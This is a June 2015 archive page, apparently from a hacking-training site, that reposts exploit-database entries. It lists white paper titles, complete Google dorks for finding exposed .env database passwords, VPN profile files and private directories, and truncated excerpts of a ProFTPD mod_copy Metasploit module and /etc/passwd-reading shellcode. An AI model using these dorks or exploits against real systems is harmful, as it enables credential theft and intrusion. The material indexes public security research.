Monthly Archives: June 2015

//June

White Paper: Developing MIPS Exploits to Hack Routers

Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel

 

By |June 23rd, 2015|White Papers|

White Paper: Privilege Escalation via Client Management Software

Title: Privilege Escalation via Client Management Software

Author: SySS GmbH

 

By |June 23rd, 2015|White Papers|

GHDB – intext:DB_PASSWORD ext:env

Google dork Description: intext:DB_PASSWORD ext:env

Google search: intext:DB_PASSWORD ext:env

Submited: 2015-05-29

This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.

Author: Augusto Pereira

By |June 23rd, 2015|Files containing passwords|

GHDB – inurl:/dbg-wizard.php

Google dork Description: inurl:/dbg-wizard.php

Google search: inurl:/dbg-wizard.php

Submited: 2015-06-03

# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk

DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]

By |June 23rd, 2015|Files containing juicy info|

GHDB – intitle:”index of” “onetoc2” “one”

Google dork Description: intitle:”index of” “onetoc2” “one”

Google search: intitle:”index of” “onetoc2” “one”

Submited: 2015-06-04

# Exploit Title: intitle:”index of” “onetoc2” “one”
# Google Dork: intitle:”index of” “onetoc2” “one”
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA

This dork allows you to see Onenote files stored in the open(*.one). […]

By |June 23rd, 2015|Sensitive Directories|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      ‘Name’           => ‘ProFTPD 1.3.5 Mod_Copy Command Execution’,
      ‘Description’    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|

Shellcode: Linux/x86 – /etc/passwd Reader (58 bytes)

Advanced Ethical Hacking Institute in Pune

Linux/x86 – /etc/passwd Reader – 58 bytes

#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m

#Info
#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c9                    xor    %ecx,%ecx
 8048062:    31 c0                    xor    %eax,%eax
 8048064:    31 d2                    xor    %edx,%edx
 8048066:    51                       push   %ecx
 8048067:    b0 05                    mov    $0x5,%al
 8048069:    68 73 73 77 64           push   $0x64777373
 804806e:    68 […]

By |June 23rd, 2015|Exploits|

White Paper: Escaping VMware Workstation through COM1

Title: Escaping VMware Workstation through COM1
Author: Google Securit

 

By |June 22nd, 2015|White Papers|

GHDB – filetype:pcf vpn OR Group

Google dork Description: filetype:pcf vpn OR Group

Google search: filetype:pcf vpn OR Group

Submited: 2015-06-10

Google Dork: filetype:pcf vpn OR Group
Author: azupwnThis dork allows you to search for publicly accessible profile
configuration files (.pcf) used by VPN clients. These files typically
contain usernames, password, tunneling ports, VPN server information and
other information.

Cheers,

azupwn

By |June 22nd, 2015|Files containing juicy info|

GHDB – inurl:private_files

Google dork Description: inurl:private_files

Google search: inurl:private_files

Submited: 2015-06-10

Directory private files xD.
By Rootkit.

By |June 22nd, 2015|Sensitive Directories|